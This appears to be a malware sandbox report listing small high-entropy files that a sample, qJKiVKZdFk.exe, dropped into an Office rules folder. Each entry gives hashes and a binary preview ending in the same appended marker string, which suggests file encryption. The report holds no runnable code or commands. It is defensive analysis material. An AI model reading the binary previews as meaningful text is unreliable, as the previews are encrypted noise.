                                                                                                                                      Preview:.<?R...u.0*.....s. yJ..%..VR..`...^O-.Y.....z...<.|.)L7..6v2....U........L%.........x{w.0.J..H..C..n..e..<....'..j....k....TZ..#l......4..W..#.H.....M..a...b..Dde.lV......D@.z...{..n9...y....0r......&'._t.....7E....Y.Z.s...v.cI..V2uM..f.....`.d....X...6.&I......y.N4&Q...b....h..M...e*....X.Y.PI.,. ...b|@.{T.d.../E..T.?...U..T"..8....pk.;..u$A..a.$.1.{...aQ.7J..".H?.....9...N.B^...7..V....L.Q^...e..F....K-...N..WQ.)...&......iO|.s....'...'....4.^Z.E...o..#H`D..[..Fo.,.`.s...u}...d=..BL.I.D...Y....&.l.{H..c.'..k......F-..Y.}v..V.f..`e.......lK..g|.Z...Q.8...J&g...Z!y..z0.....L.........R.0T;....=.....|.%.A.;..}.p.^F...G'..5..8.....D7.....|q.4M.....Y.ATQ[.mR.W{.y_..>.E..'..1R...w(....k..Utp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120619v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):741
                                                                                                                                      Entropy (8bit):7.707024049963064
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:beLP5ZLtQl6GHxvxKMekpPfG2DL6tjwvu+iW26cqEhsUGkx6oBLKtHukIcii9a:KLxslhgMNPfd/LiW1cqVDk3LKtsbD
                                                                                                                                      MD5:6864B1549540FC8D228A89DB9EE70E65
                                                                                                                                      SHA1:2E59C77A0ED1717B39BBEEE8906705E0A8817F3C
                                                                                                                                      SHA-256:B0483F2FD969B67A3D616D869F6841F448C1369383A4C7AF40C33C42B245B703
                                                                                                                                      SHA-512:ED926B71D51573E2F8397BC742B898C6B73F5202997C974A9E809072A6BE5014548DB1B34708EC8413276C84A09F378AFBF836016A230616C62D192A24737B5E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.$)Nb..X......6 ...f.P.~E{c.6.].QSc.....TZA....._].....y....|...&.[J.....)`H...{...S.UU.M..v;...C..*bf.....*....v..E"....u......Q..D..A.....Q..O......`..,]... .O....<M...b....W...+...4J.fc]."I..?<3.e.).D..G......p..@.0:M..?x.LT....]s.`..O#...F=h....iY.}..L.,..{.*DYI...qowS...4;[N..yH.Y.....&....[@...clt..}.c..b...c...WAc.....>....*.Bj.6..s.q.%L..T...........f.j*L.L...v.^....[..!5..........i..Y..0/......5...k..)s.2..[:.U...p..+,/.a.Z4.....2|2OM.%u.nl..Y....v..&...u:*..E7.s.5.E.Q.F..&%_.....7.;.<..].D.9VV.....1......%.....y...e....R.ls../{2...9.9H...z.=.F6.....E..5.T.z{#......'H....0.......zx.....{e...).g.{U........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120620v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):803
                                                                                                                                      Entropy (8bit):7.710393532674649
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:jRTRPDaIQVdIn++76dNQI/A+LLj7aVPbD:tT4IWY+M6rQI/A+qVTD
                                                                                                                                      MD5:03A7B6BB6C3EEDC9C60C7218D19E6B88
                                                                                                                                      SHA1:51AB7EDD675DA8DAA3C832F202110047EF48E94D
                                                                                                                                      SHA-256:DEBF66C2E72660918F1A6311B7ADA9EC61F2529E8CDC7BA74B4DE4DD9A452A52
                                                                                                                                      SHA-512:598717F70A40BCF29E5995AEA28A402F0B922C2ED03DEB45519F1443425E8D16C8CD1A21C6A0CFE9AEF66B78D43FA46CD8979FC300B1A6E23E627277235AEDD6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.zAt...........f._.k.G"..HH..kJ..5N.......6m..-..bp.L..Z!}W+.....c.O.'......H.=.o#......o*..HQ.7..3].-... .c...[..4..r......_.)..d.N.~:..Q..{N.O..ot.....e....39......E......5...l.B...R..0...hBtv9............ &s....$.g..."P.S......<.A.Z.NV+h...A}.[.....`.`.4(.hF..J..1...`.4......I...^..J..HR]N.t(..........Y...|.K.h.l.%.D.G<.a.....Ic.W(a.T..i8I.v..N%:?..G..I....S..d'1....CF.^...gE.|.k....>.s.....?U.Y...,..t.&......UZ=..%ceZH?.s...2.....q..n...!'.:Y`52..J.*.%.......>&.[.+.=...;.F..p.T..he<xxz.q+."L%..N....,Q....r...S7.Urc.Sv.N.:.......d...]0....t.M.A>=..k.H...6........g..H...X.N.o0`9]::.......bz.7B.......b.h.=.).4..cX..%..=.4(..../.a6...}t5r..BY..-uC..w.i.Yuv%.*.c..}..^2.e..R=".i..Itp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120621v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):749
                                                                                                                                      Entropy (8bit):7.724471475338846
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:omzTmzfto10SNdE528D44DKRIHJyN0JdMP87xkM/DgtubdIVgdEbRznq55eNRuGe:Vuz16fNWc8PDKWpNdMIx9zTdkAaRuBbD
                                                                                                                                      MD5:28ABA1101EFAC391B29093C18341F8E3
                                                                                                                                      SHA1:B25E456ABAE9A04618228CEBFAF277BCA035CBD0
                                                                                                                                      SHA-256:AD02D3404FCC974C3CE76D9B5BE570D1F4BCCBFE00D74B6EEF6B04FC323F6E57
                                                                                                                                      SHA-512:26A9F33561C8EC913D7CDBC08C6FA7EBDE03706F817BF48F8A2AB419745BE8C0E5A8322BA2C96768AFCA5DE0946446DB117FB8775D18463F214FFA2AC302A28D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?......NOP...?....y..E..~F......yZ-Y.(<?-..'8....0....*/.I......V*L8...k.1z...l.C].)..c....L.B.v.z..l'+..@...-,.'..x..%...w.C..n....His.....1...<s.x.^v..aLHh...Ps ..M...........nd.O..G.l..p*~g...n....T..........ya.U....T..-A..(.$.>3,<..}.Oftr.FJ.....[y..{.0$.)V..]Z.0..=w.`.h|Qf.9...o.........6...j:.G....D}..K.E..5,.....-@5......0%.]Y..f.NT.F..1j$x...u.N......7g_...!".:.3..)..`...MZ....e.KU.&.A.....8..w.Nz...}.5K.v.ih.b.!....k..m.}.\..~..tt.*.w.i2S...6.'.e..h..+.A.PD...I..S.+..J.......,......n3G..E../.%j.{.!%f9.V..R......6.._$$Yc...M..^+........}..G.Ak6.J.....x2.......Gj.1g....LQ......m..+.u$.Jn.*....[.....Z7].........!.<..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120622v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):811
                                                                                                                                      Entropy (8bit):7.6916678396396865
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MosZ2RujeUG3ZG/bqNUhX00cQjjXeIlrvlx8QbD:MossMyjKqWtZxfOIFNxD
                                                                                                                                      MD5:947590633797E0E2BEB65870D2ED9995
                                                                                                                                      SHA1:E4CC8E13FA4BE11884F6AC97E3F82DC81525370F
                                                                                                                                      SHA-256:6458623328069C850BBABC589940D3DFE2E2B8BBC6DBD820BBC49733D1088FC7
                                                                                                                                      SHA-512:1710CEE0508DC31528F1027DACE22ADF4E5BFD4DB779E5F89A6F8C22617A78290A7D97075A099D4E0E2B98C6221F77A5715271F4E15F9AA29338BBCC00F3CBC0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?,d.....Dv+.tj...}....;.m..+.Yo........W`..1x.j..5.bw....a..)..zQjeR.".k'5..V..0Z........0Z...8.j..5.,..kjK..W.......`.KW&^...2-e.i........g.Z.Q^......h..J.qC.6....f.=.W.y..FM......6o..j.M..54Q..BN.t-.3l.L>n.}..=s...!..-".S...#..RA.X..`.|..u.7....*8..-.l...bW.P.j...0.p..3.ZP~.....?.y$..A.g..=..c+...#$Jr...{. .3.c.=.TZ..<.V/.....~..g....../..V?..=....v.0.n.j..!...X..{.Z.3.x..o.N.>K,....a....$.8....Y.;.P.Y?...M.0...".!a..w[;P....c}......bs&...s..t..~@.XX...<`...[.......-.k. %......f.5...~.#..V ....g.9..l.R.l...'..>{9..._.B.g.;P.=x&..{W.C.....%....<...T.....F..........|.}D....cxI.w.>.ml..@1-.TA.|..V-..6..Z..^..N..4}.b.oS.....;Ue.. ..oi.?..31.D.q..J~b.N.-!.,.6.....e....,.FZ4d....stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120623v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):798
                                                                                                                                      Entropy (8bit):7.745221428365869
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:shbfhWEMXiRiPsCXgJyBzAhPNn/JDXCrTbD:shbfhWEgEEsggABGPDSzD
                                                                                                                                      MD5:977C865175ADA44F8EE6EEBA929B3830
                                                                                                                                      SHA1:620457E5E2B745C81203FA83D7DAA85F3A813296
                                                                                                                                      SHA-256:43E0978B70F63A5D74D0CD8B9A4B089EB326BFCB4C9E1A1388E1374BEB0D91FB
                                                                                                                                      SHA-512:AC27FE4488F3EFC9F434180B8ED894804E35C7F6FFC5A3D2B17132DA06DD5601B7DAFDB4FB79F707B92A09A97622682B8DCE98F0D0C1A82AA9E28C1E9AF9ED1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.mY...b...A.1..X.k4K.HL.[..5?M=...._....j.%.......J.I,...l~...u.h......c....B............A.%L....".....*K...........N<..z.E".....j).....B!..Q... .|p.....D.........'i......#.}.2....... |...W.~@...#...Y..U'....qf..M.eo.......P| ..I...K......L.iVC..LMS/..3.v1..:.l9...?..'...GZ./C.r......+>u...@../.m-(.?..AM....0...f$A/.U...c.NN.)^...$.$....f.7..u4...........o.............YE.1U.6....X.s%.=OI...d..Y/V..%OM..j....l.g.w.t-.................>.b8.u..tD.:4|Hx*. !..e.J....N..D..P...y..k..M..D..H..sc..,.[.Vf...0T!.9N..).s..k....R...{9.;...]2...4.....u..a6.......[0.H.._./...........o....><k...?./..G..._%......A......4......JT.y{.%?.6...,...{sr...?.Ir.H.&A5^i......d..9V..i^...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120624v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):828
                                                                                                                                      Entropy (8bit):7.726420084442275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NVx28urMLOQ0HPaHAieLIL6Q2dO3mPPxsFDYc5xLG6PbD:72YL8vaHAieLILv3YPKFDYGdTD
                                                                                                                                      MD5:C9150E4F621E534037A9A45F6D843267
                                                                                                                                      SHA1:4F0909FA598863F4FF53723ED3E6BE5000CB0FD5
                                                                                                                                      SHA-256:1339E32F0F9715236EED10E56132C34D336F2E35104FFB37FB6019205B68B62D
                                                                                                                                      SHA-512:C8C5F60124A5A7A2FD22C6EFF66ABCBBDE8333BE048E3731FC74CB62FCD849EDB1BC1186108A3C32B67A74E7C697F00C86A388F6A23C4E2C8E5484F293148DDE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...g..e.HZt...mT>w..4t...k...j.ID.L.....D..3...~....YF..f.a.|...~....x.9^.....&.U...8.(.;.....I.!.e.l..X9.?.|QY..&^g....=+..w.V...g.Wq.=......=F.5.......#K*;..2.G....M......>.Y.8...rd._.v.PI.?0C.b~.bz._.-.3.~G.`.Q.JV...s..cz(.........Dr...{C...rC.Y3.T...1..l.0/.n......J......*.n..}........*..wc...8..{.......bp.m.%..R.;o..W........a.s.....JX.~Y..........6.}L..%.X.I..t:.k.d.~."5 >$.V._..J..6..Q..!...#...v*$.T.Ix.d....`p.An........g{....<tF.3.....)`t..gz...-...V.......I.`.z...gV....fV7r..aD.+@...o..P.}X.^.".Fe.o=....P.s;.i....df..'_=r.@:..K.M..wn})..G.t.....U...!..$..3.PJh...BF..AgA .CQ.. .~m.6..|.~....X..BP;JX|X......R..e.x....r....[...|../..'.....ly<...C.^.>.*.oT.A.Y(U.tj...b...Js+....wun.......h...7.Ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120625v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.711386097023788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:bZCAPI5RXMaMDqu8QJqi8JGiEhWbkMs3TI8VPoiZUKhu+JoELwz3ymkbXwQnpclh:bdUCSJQJgJrEZTZlcKRLcim6XwQpclr9
                                                                                                                                      MD5:6A963F3A16307D57CF9121E3CF0FF006
                                                                                                                                      SHA1:E4418729945D4B4D0F21AF35A89716578E979E36
                                                                                                                                      SHA-256:8053F418A4D023B7A2D2310601E164E041B37EECC31FA2D95EB7CB1063075E92
                                                                                                                                      SHA-512:DC2AAFD977D8F5085028987B7CC81793E0A0D2DB9BC56D6C86B56801146D1DB83442EEC69DB259DC300C3D65C328AAB21889C4C8CD347DFDA723BF9702331A18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.YE..g...g.U.Z:.D.....c..es.`..UH..y......d&....+..f..Z..an...^...M.Pn.&.&$.@........@7TIGe...K.NS...6@..h...].HZ........5...Q....@...r.(.)......./o...x@.....o..u..~;i..'.....c(........}..P...L.......cg/l.'7.$|...z..s?..0[.U.....:...CqKC9...././..........!........@...'F .....=.\Sivm.W..N7...J....Z....#k=.e..d.'9x#@.n..6....[..h........e.Q.?-8...k .E.d.b.Ynw.P..~..2.3..}G.T.D..o.`.U.)...$.j]Mj..f.[.a..$...I.9..kT.k[.z.c....N.l..........}u2...,.G..C9.qe.*BE...W....^LZ....Fz..H..&.6.......N..N.5........c./.."%ok.D....4...h......INg......S...HS,..i.....V.4..%...,b.^...[VE)$....b......_........C.1j.UT....V.p.A...!.>...@J.C.N.....^.T....F.9.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120626v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.7439871225282095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sODkEBubC+RF1nIqpUaNQKAdJhBlqqtvMw+uUbD:LDZGCCF1hps3XlXt6D
                                                                                                                                      MD5:00578A50969E8BCCDC2C58A0D5A8DA0E
                                                                                                                                      SHA1:7A644032F7165B060A15FA08ADE80D9BD18A24E4
                                                                                                                                      SHA-256:B822B2817D6B86AAE9BA712F16236324D36E954CD1172DD9D5C693EC8A6A11D9
                                                                                                                                      SHA-512:2BBE179FE2655FA09882755CC8009EDA7C26B223EAEC9DCDAE313048E2F3887C7FF3E57CEDA967A818860B7AF3B25A07AE0AFAF6550E251F361DA43D518FA23F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..v.!...0|$....3G..-.>........[mhN.E.......5.!&.f..y..B.-......c>.U.....ef^5.....k?..^f...;{".d9...D..Q..>s.(x...).q2.^GU..$.C..b.,S.a........b~.P]......`..`.9z...M...r...X.....t.I=12..o.|p.. .W.8..:.P0.;T....~...q>....=..l......6........mu.X9....yD...A.;.p.6.".c..Wf/.....X.jOh.|v..oN..+........W.-..Z.y....X.{.r... .s....c..g....I.0...`G.h...!....o.C.t..$./. ..... ;........R..a.......{R...].sIU........'....rF...2.....j..,.'..L.$q......`....2..L.I~..H~K.....*..4...|"..h.|.w..0.....b..WL-.S.<c-..V}..H.D..Z.,.)...A.`L...u...j\.M.....tBb6/..+.m.o7.'..!.|......R.7.^.2e6t...9.TN...UD.....I.n).E..W.......UPR.e....H.r].Eq.P...0,.....t.3,..d.a..O.8.B.G......(1...KD?...>.....sVkf.~Ntp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120627v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):738
                                                                                                                                      Entropy (8bit):7.702225908676162
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:daGYsc2m+W6lbJdUKNpYfRz0YMuEi+T5SYtEv5XjquaatieYukIcii9a:rYsrm6P3CBMuEnT5XtEJjqum4bD
                                                                                                                                      MD5:714004808A91B943EE3CAA12DC02D389
                                                                                                                                      SHA1:08DBC4BEABFE6CF6CF1DE4F19545B4BF40A1A3D7
                                                                                                                                      SHA-256:43B9397780FF7DB131B0E39ACBA6034673CDF25010D4D4E01BBFE57C5D82C7B9
                                                                                                                                      SHA-512:FF8CF52CF1565AEFED6B2CA3E74E0C4B01AB55A1C218AEAAEEE5F4DCE21314046EF1BC97879E1CC13597FEDB96A39D8445CC73646058AFF503F088641C934D02
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?......j..s.@~.;d...9.'...R..2...U.`..8.y45.Z...4._.....(..P......^..J2q...\.k}..o<.%.a...4.....+K...K.@..(..3.....Yx.....T.a..6.M1[.7`.....7.:...V*.}tc.($.?!..y.k.....cp.'=..H\..!>.......T...5}..I<.vDk......|..9....W....VB..f9..l....URB....U.;..3.Pa.............qX.p...Se..Rt`6.....'3.E....7...n.RK...kSdX?$ .L.3P..K...|.....E..3..a..<mV.....'..:....l<8......`8...$.M/5lcx(.V."|.......X.!.5........w..pR....9....P..$...IT...(!`I.e).Dm~..E6.# 4../.......@MLK-\@...o.?..R0..*.S...^G7..{.A...dXf...M..>.1%..^.s..\;}}.?@H..1Z.c..........L}..`{....&.dt.../@o...:B.&.:.!0v...?....8..>..Fa..n.....Q......hZ.o22.g..,_.E.v+[...j...uJ..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120628v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):802
                                                                                                                                      Entropy (8bit):7.692088330394465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:apTejDsn8pboFYzKejyqChlILCvmPMXxLoP2J0z9H6iSC3rCcLnrqLvsukIcii9a:VfsKoFYzKOyqsVhLoP26A7C7CcLrOnbD
                                                                                                                                      MD5:E24B3028546385C77A6AA40835C82993
                                                                                                                                      SHA1:72DE3C7C0D74054C7B787AEA716004600C9AC10C
                                                                                                                                      SHA-256:6E7E9E5DE8A98F69A453E28AAA29544DE2F097338B5440F4F6C4480AB3FF30BE
                                                                                                                                      SHA-512:FCD75589A1C44E8D3DA88B72C4A56AD10CFFB8B85AB8C26EF661B2DA708EB1C0D73BC521D0845FD87999770C06C2A7306782EFC066C46C6CEBB11BB3979E590C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.....z.`.._....r.y.@...y.}.L"....M...D|g..v...n...C....=v.gTj.sp...\.V..s.6.D....r...8...\.X.*.#Ct..2;j.`..s.....O.n.5.....|.P0_.T.l.O.....t..D.,v..)p....L..m...................3...67t.Y.f..C."7.nJO...g+~g.6..I....;..T.....r8.#1.P.........Rv..7....z..'..|...E..9..O.........o.g..........^.y.C.....4H...]...'X.....C.|jH..\15...H.j.@)....K...a.}...Rr.u.z...2....I..[.R.......2."[..i.....9..^.....Z@...w9....... .l.d....=&.>.<!]z.......+a.....?..l@.....4%.=.!y..GY/..A1.d.J&..T._Qm.._.....@\gQohg_P.F..{.......}UF4..4......3.?..~!.`c.....#H.D......:...<.....O..........3.=.7f.....=n....V.q.(...Jr........B....P@..w..s.5GP.;<.7-.....u?...<.(^..I...4.S6....^...H..]|d...\...o+...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120629v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):762
                                                                                                                                      Entropy (8bit):7.688238071524494
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:+79xRCkaafFlXL6VpPGjVFQsdwDCdfGqt6IX1VQAUu7ssqqZGICRqkXCRukIciik:+ZxUafFlOHGzeCNtPFmA37/6ICRHbD
                                                                                                                                      MD5:257684F2B8425ACA8F01DEAC59691356
                                                                                                                                      SHA1:4EEA26EE5081D3A3F25CB37580A7A93C0DCC1467
                                                                                                                                      SHA-256:E5414BCA1EF0C4C1122C7BD022DDA3CC1880560A431A4255D35ED748420D93BC
                                                                                                                                      SHA-512:02A21DE21071A15D6A78044DD4DD842C0B97799F2A3B6FB0CC7C4CAA7F791B9773235E4FA73D426F5D9851BA9F9F2EBF20C5967BFB7F9E9B2EC545171FD0CFEA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.....-.+...?.@.C.W.w.l........+Z..q.nE...9..d.r..4Y../9=..[.......N..$Dp%.....&!...oN.._!.S..C^vk.i...L.O3.d......m.EcuNyQ.8l...Z. .j...c=h.|....@n^Pg=&.!X.7v.n*./.k#...c&..1.{..&L.>..&...i.=.....|...vK.}.d2J'.x$c./.te...YW.....d.t....,N.|n...n.}D.q,.....w..[9..c.l.......i...0....X......x...Z..Z^"...A.p...?..ib..V.....+..f...f.......c..O.G........f..=0a..43...$4.........fE.v...../..B. Ry.2*...)$M:v..H......5.....2.................n3y.Y.!.9..)Kdt...X....#.@..:..p3g"..#....P&....~..W.K.:+.J"e*.F.."x...q..`e.sRa....kB..UL...&.t.."...9.....J..j.t.|e..}/..r...O..5.......J....[...P$..[x.[B...Q..l.Y-.k~).<.=.J......2.x.....[..N9w..I"........7....7..:.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120630v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):833
                                                                                                                                      Entropy (8bit):7.716140493630787
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IyJ6fqWUv2MkN6pHDYoLNgsvao6xR/j7RbD:Iy4fQe3EQi6x9jlD
                                                                                                                                      MD5:AAEAFE12F55D7AD0B2AF745D75D07004
                                                                                                                                      SHA1:133ED82D57FC3206FE2985A473812804AD8AE3DF
                                                                                                                                      SHA-256:40D6183F2A0820C368B896BCAF4114154040FD22FE11186C87D109D74138F6F1
                                                                                                                                      SHA-512:51FF98AB720146A0346A98A1DACD8025F1BED37D70DBF215077254CB046D69CD51B1B7098454C7A0AD7E77D8DB4132033E5ADB162A6C8E0C89060496E9CD5D04
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?].sx)...6..Y.=[F.8.....|B)t~...t...Z.."..,c...-..Jj.....~.....C.KXL......2...fo?...!..C'W....ZH.......2.....E.[a.7!......P....||.~.].X..7 \,N7...*...:....f.2......SL.x8UV........hW.O.G#.&#c$.EqD~..e....^R.^.gcV{S3J?U...V.1s..2g...|i%98........1b..k.l<K&D..@.w.....P&?e. +>.5..,...e.Z..k....Dhx..</..~.q{.......!/..^..,..[.s.5..fg...'I..Ws.F4u.-VH..1....Pj...)T..,X.M..|-.O.$....Aj.C...p....bN.~.......V"..+..;;....<..~...[DA..H.A.,...2..Z.i.l!3 ..r.V6j\G...NI...-~..E4A....m.p5^5p0.0E.8.+....:...i......+r...k..4.V...g..a....V..N\........V.G@#.L7R.....L.........;..*...-eL...F..'..$..uK}pH.\.a/q...w.9.1..+.O...K..].T.I .....-......Y.9+Y..d....."hZ...r..s7..9.}......k.S.. .l:..E.....+M....R....{.=s.U..._..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120631v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):749
                                                                                                                                      Entropy (8bit):7.7261209525872445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Ffway2JQs2nMa6mbtjB1quyZrJoJ2UmlgsR63BSMGJtubqjTIvkYHuukIcii9a:7JQs2MVmbtFIfKmLckvObq+kYpbD
                                                                                                                                      MD5:8539C8ED8D0D2A39435E95FE1788F4FF
                                                                                                                                      SHA1:7077B5F09FC3010B785D56711BDBAB42306B80F5
                                                                                                                                      SHA-256:7FBDBC2A77104500A0F9E91D8AD93DA44C208E48E4373E46C576698E5BFE2687
                                                                                                                                      SHA-512:C286FDE83A96794FCA1E028B987A6FDEE08847E8CD896E90086B9C76B080EE71F034FC464B765B808BF51A7CC1CC3C2C1C9EA6E33AD49B41FA26393BDFE685E9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...I..%X.)..E./>.Rb........#|......k..G~-.O.#.u..~..';smyY.!..b"G..Zy...F7...$.u.7..... .......U...q..^C.b.8^..h"&....8..,...EX.$.6*..b....I....M.'O..\.z.7).\.|.<q$.d3$.8w.......R./.g...<.=.#...../|.^2......x...X].........).^.Q.@L.....E.x....!....W..<.p....Az...[.z...u.-M.u..CH.C..)b.....%...R...95+x.A.k..f.....,.H..m.*.@.t.Fe..}7a."S.q...V.1b. W......<.......JFN{|....e...D.l....".7.].....?F...f.......z....4........!....E....efl.]...}`...~..N..`..v...5}.w..!.2.h....86.b..K).../..N{...S..U..)0.......g......%..2x...I.M...z...F|rJ).QD.:..o.#0^........;l...~q9.mh..3.>$.\..Ca....D.....F)0z....g.. 3i.K.*U.....^..'.e...U)....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120632v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805
                                                                                                                                      Entropy (8bit):7.725226486953151
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0qFP6u/EaC8s+l6xHpC3nxGg6yrXXUPPT1bD:rFijaYBEGgLkjlD
                                                                                                                                      MD5:B93A9406EA7D385834651D8FD158D055
                                                                                                                                      SHA1:D73C2F2D8D36FEB135BA17E4C6E4343D9958BB1F
                                                                                                                                      SHA-256:A9152DB15CFDB1774F2971EF50646A20244F1EAF0BB461BC9E865E6B916B719A
                                                                                                                                      SHA-512:225BD4AECA529709C446FB3EAC1910F4E3BA0A9C4473DAC4A4433283530D35BD9C7583C721157EBEA61667C24C9B8220568A9C8662588EA21D3980C4765C2A11
